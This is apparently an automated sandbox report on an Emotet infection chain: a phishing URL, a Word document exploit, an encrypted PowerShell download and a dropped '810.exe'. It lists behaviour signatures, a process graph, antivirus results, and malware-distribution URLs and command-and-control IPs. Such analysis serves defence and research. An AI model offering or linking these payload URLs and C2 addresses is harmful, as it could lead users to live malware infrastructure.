Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\810.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\startedradar.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\810.exeCode function: 6_2_00D0332D GetVersion,GetVersion,GetLargePageMinimum,GetTimeZoneInformation,GetTimeZoneInformation,CloseHandle,IsTokenRestricted,IsTokenRestricted,VarCyFromR4,6_2_00D0332D
Contains functionality to query windows versionShow sources
Source: C:\Users\user\810.exeCode function: 6_2_00D013D2 GetVersion,6_2_00D013D2
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\810.exeCode function: 6_2_00D0257B GetVersion,RemoveFontMemResourceEx,RemoveFontMemResourceEx,RemoveClipboardFormatListener,AllocateUserPhysicalPages,AllocateUserPhysicalPages,GetGuiResources,SwitchToThread,6_2_00D0257B
Source: C:\Users\user\810.exeCode function: 6_1_00D0257B GetVersion,RemoveFontMemResourceEx,RemoveFontMemResourceEx,RemoveClipboardFormatListener,AllocateUserPhysicalPages,AllocateUserPhysicalPages,GetGuiResources,SwitchToThread,6_1_00D0257B
Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 785940 URL: http://leonfurniturestore.com/sec.myacc.resourses.biz/ Startdate: 12/02/2019 Architecture: WINDOWS Score: 80 47 Encrypted powershell cmdline option found 2->47 49 PowerShell case anomaly found 2->49 9 iexplore.exe 7 63 2->9         started        11 startedradar.exe 2->11         started        process3 signatures4 14 WINWORD.EXE 54 20 9->14         started        17 iexplore.exe 13 9->17         started        57 Detected Emotet e-Banking trojan 11->57 59 Drops executables to the windows directory (C:\Windows) and starts them 11->59 20 startedradar.exe 11->20         started        process5 dnsIp6 63 Encrypted powershell cmdline option found 14->63 65 Document exploit detected (process start blacklist hit) 14->65 67 PowerShell case anomaly found 14->67 22 powershell.exe 12 7 14->22         started        35 www.leonfurniturestore.com 17->35 37 leonfurniturestore.com 184.175.67.101, 443, 49222, 49223 CYBERCON-CYBERCONINCUS United States 17->37 39 a767.dscg3.akamai.net 17->39 41 181.15.224.57, 49236, 80 TelecomArgentinaSAAR Argentina 20->41 43 184.101.191.86, 443 CENTURYLINK-US-LEGACY-QWEST-QwestCommunicationsCompany United States 20->43 signatures7 process8 dnsIp9 45 borsacat.com 185.2.4.75, 49231, 80 SIMPLYTRANSITGB Italy 22->45 33 C:\Users\user\810.exe, PE32 22->33 dropped 51 Drops PE files to the user root directory 22->51 53 Powershell connects to network 22->53 55 Powershell drops PE file 22->55 27 810.exe 22->27         started        file10 signatures11 process12 signatures13 61 Detected Emotet e-Banking trojan 27->61 30 810.exe 1 27->30         started        process14 signatures15 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->69

Simulations

Behavior and APIs

TimeTypeDescription
20:12:34API Interceptor251x Sleep call for process: iexplore.exe modified
20:12:55API Interceptor1x Sleep call for process: powershell.exe modified
20:13:14API Interceptor2x Sleep call for process: 810.exe modified
20:13:22API Interceptor2x Sleep call for process: startedradar.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
7.2.810.exe.f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
6.2.810.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
9.2.startedradar.exe.110000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
8.2.startedradar.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
8.2.startedradar.exe.280000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
7.2.810.exe.110000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
9.2.startedradar.exe.f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
6.2.810.exe.3e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLinkDownload
http://chileven.com/YAsyH0%Avira URL CloudsafeDownload File
http://fatrecipesdoc.com/I20clH0%Avira URL CloudsafeDownload File
http://borsacat.com0%Avira URL CloudsafeDownload File
http://chileven.com/YAsyS0Mslz0%Avira URL CloudsafeDownload File
http://idjvn.com/eUH0%Avira URL CloudsafeDownload File
http://borsacat.com/9onrkqJ/H0%Avira URL CloudsafeDownload File
http://borsacat.com/9onrkqJH0%Avira URL CloudsafeDownload File
http://borsacat.com/9onrkqJ0%Avira URL CloudsafeDownload File
http://borsacat.com/9onrH0%Avira URL CloudsafeDownload File
http://borsacat.com/9onrkqH0%Avira URL CloudsafeDownload File
http://idjvn.com/eUBrJig70%Avira URL CloudsafeDownload File
http://fatrecipesdoc.com/I20cH0%Avira URL CloudsafeDownload File
http://chileven.com/YAsySH0%Avira URL CloudsafeDownload File
http://idjvn.H0%Avira URL CloudsafeDownload File
http://borsacat.cH0%Avira URL CloudsafeDownload File
https://www.leonfurniturestore.com/sec.myacc.resourses.biz/0%Avira URL CloudsafeDownload File
http://huyushop.comH0%Avira URL CloudsafeDownload File
http://fatrecipesdoc.com/I20clMx8H0%Avira URL CloudsafeDownload File
http://huyushop.com/P2ryBfybD0%Avira URL CloudsafeDownload File
http://181.15.224.57/0%Avira URL CloudsafeDownload File
http://borsacat.H0%Avira URL CloudsafeDownload File
http://borsacat.comh%0%Avira URL CloudsafeDownload File
http://leonfurniturestore.com/sec.myacc.resourses.biz/0%Avira URL CloudsafeDownload File
http://idjvn.com/eUBrJH0%Avira URL CloudsafeDownload File
http://borsacat.com/9onrkqJ/0%Avira URL CloudsafeDownload File
http://chileven.com/YAsyS0MslzH0%Avira URL CloudsafeDownload File
http://fatrecipesdoc.com/I20clMx80%Avira URL CloudsafeDownload File
http://huyushop.com/P2ryBfybDH0%Avira URL CloudsafeDownload File

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.